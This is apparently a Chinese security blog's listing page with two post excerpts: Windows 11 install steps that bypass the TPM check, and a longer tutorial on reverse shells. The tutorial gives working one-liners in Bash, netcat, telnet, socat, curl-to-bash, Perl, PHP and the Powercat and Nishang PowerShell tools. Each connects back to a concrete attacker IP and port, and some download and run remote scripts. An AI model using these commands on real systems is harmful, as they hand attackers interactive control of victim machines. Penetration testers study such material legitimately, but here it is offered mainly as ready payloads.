首页
相册
统计
留言
更多
网安工具
CTF工具
关于
Search
1
椭圆曲线加密算法原理(ECC)
5,324 阅读
2
SMBGhost(CVE-2020-0796)漏洞利用
4,302 阅读
3
关于gdb调试
4,065 阅读
4
Arduino使用CubeCell开发板进行LORA无线通信
3,852 阅读
5
Diffie-Hellman密钥协商算法
3,542 阅读
深度学习
技术随笔
应急响应
漏洞复现
流量分析
溯源
入侵检测
Linux
eBPF
服务配置
渗透测试
信息收集
横向攻击
密码学
web安全
CTF
登录
Search
标签搜索
单片机
密码学
Windows
BPF
Python
Linux
Mysql
APP开发
软考
Cobalt Strike
flutter
入侵检测
HSM's Blog
累计撰写
53
篇文章
累计收到
11
条评论
首页
栏目
深度学习
技术随笔
应急响应
漏洞复现
流量分析
溯源
入侵检测
Linux
eBPF
服务配置
渗透测试
信息收集
横向攻击
密码学
web安全
CTF
页面
相册
统计
留言
网安工具
CTF工具
关于
搜索到
2
篇与
的结果
2021-11-07
win10更新Windows11(绕过安全芯片检查)
MediaCreationTool.bat创建了 11 个媒体,这些媒体将自动跳过升级或全新安装检查,其中 11 个安装标签(未更改为服务器)和 11 个家庭版的本地帐户支持安装步骤2.1 浏览器访问 https://github.com/AveYo/MediaCreationTool.bat2.2 点击 code , 点击 Download ZIP2.3 解压文件2.4 进入解压文件夹2.5 右键以管理员权限运行 MediaCreationTool.bat2.6 点击 112.7 点击 Auto Setup(其中有一步是将镜像保存到硬盘)
2021年11月07日
1,247 阅读
0 评论
0 点赞
2020-05-19
反弹shell介绍
一、 反弹shell简介反弹shell就是指由被控端(靶机/肉鸡)发起连接请求到主控端(攻击机),主控端需在被控端发起请求前提前进行端口监听,最终产生一个交互的会话过程就叫做反弹shell。反弹shell适用于如下几个场景:局域网内,无法直接连接被控端;目标机器的IP不断改变;由于策略限制,对方机器只能发送请求,无法直接接收请求。以下介绍下几种反弹shell的方式。二、 Bash反弹shellBash:Bash是一个命令处理器,通常运行于文本窗口中,并能执行用户直接输入的命令。VPS:nc -lvnp 8333靶机:bash -i >& /dev/tcp/43.138.236.131/8333 0>&1三、 Netcat反弹shellNetcat:NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection)。它被设计成一个可靠的后端(back-end) 工具,能被其它的程序或脚本直接地或容易地驱动。VPS:nc -lvnp 8333靶机:nc 43.138.236.131 8333 -e bin/bash四、 Telnet反弹shellTelnet:Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。VPS开启监听:nc -lvpn 8334客户端链接:mknod a p;telnet 43.138.236.131 8334 0<a | /bin/bash 1>a五、 Socat反弹shellSocat:Socat 是 Linux 下的一个多功能的网络工具,名字来由是 「Socket CAT」。其功能与有瑞士军刀之称的 Netcat 类似,可以看做是 Netcat 的加强版。Socat 并不是大多数Linux发行版本会预装的软件,需要手动进行安装yum install -y socat 或 apt-get install socatVPS:socat TCP-LISTEN:8333 –靶机:socat tcp-connect:43.138.236.131:8333 exec:'bash -li',pty,stderr,setsid,sigint,sane六、 Curl反弹shellCurl:Curl是一个利用URL语法在命令行下工作的文件传输工具,1997年首次发行。它支持文件上传和下载,所以是综合传输工具,但按传统,习惯称Curl为下载工具。Curl还包含了用于程序开发的libcurl。步骤:VPS:1、 创建index.html文件echo 'bash -c "bash -i >& /dev/tcp/43.138.236.131/8333 0>&1"' > index.html2、 开启http服务(与创建的文件同目录):python -m SimpleHTTPServer 83323、 开启监听:nc -lvnp 8333靶机:curl http://43.138.236.131:8332|bash七、 Perl反弹shellPerl:Perl一种功能丰富的计算机程序语言,运行在超过100种计算机平台上,适用广泛,从最初是为文本处理而开发的,现在用于各种任务,包括系统管理,Web开发,网络编程,GUI开发等。VPS:nc -lvnp 8333靶机:perl -e 'use Socket;$i="43.138.236.131";$p=8333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'八、 PHP反弹shellPHP:PHP(PHP: Hypertext Preprocessor)即“超文本预处理器”,是在服务器端执行的脚本语言,尤其适用于Web开发并可嵌入HTML中。VPS:nc -lvnp 8333靶机:php -r '$sock=fsockopen("43.138.236.131","8333");exec("/bin/sh -i <&3 >&3 2>&3");'十、 Powercat脚本反弹shellPowercat:Powercat是一个powershell函数。脚本下载地址:https://github.com/perlh/powercatVPSVPS上传Powershell脚本后开启http服务(python2版本):python -m SimpleHTTPServer 8332VPS开启端口监听:nc -lvnp 8333靶机靶机运行如下脚本即可看到VPS端收到反弹的会话(web服务的端口记得写)powershell IEX (New-Object System.Net.Webclient).DownloadString(‘http://43.138.236.131:8332/powercat.ps1‘); powercat -c 43.138.236.131 -p 8333 -e cmd十一、 Nishang脚本反弹shellNishang:Nishang是一个PowerShell攻击框架,它是PowerShell攻击脚本和有效载荷的一个集合。脚本下载地址:https://github.com/samratashok/nishangVPS上传nishang脚本后开启web服务:python -m SimpleHTTPServer 9933VPS开启服务端监听:nc -lvnp 10010靶机运行如下脚本即可看到VPS端收到反弹的会话(web服务的端口记得写)powershell IEX (New-Object Net.WebClient).DownloadString('http://43.138.236.131:9933/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 43.138.236.131 -port 10010
2020年05月19日
945 阅读
0 评论
1 点赞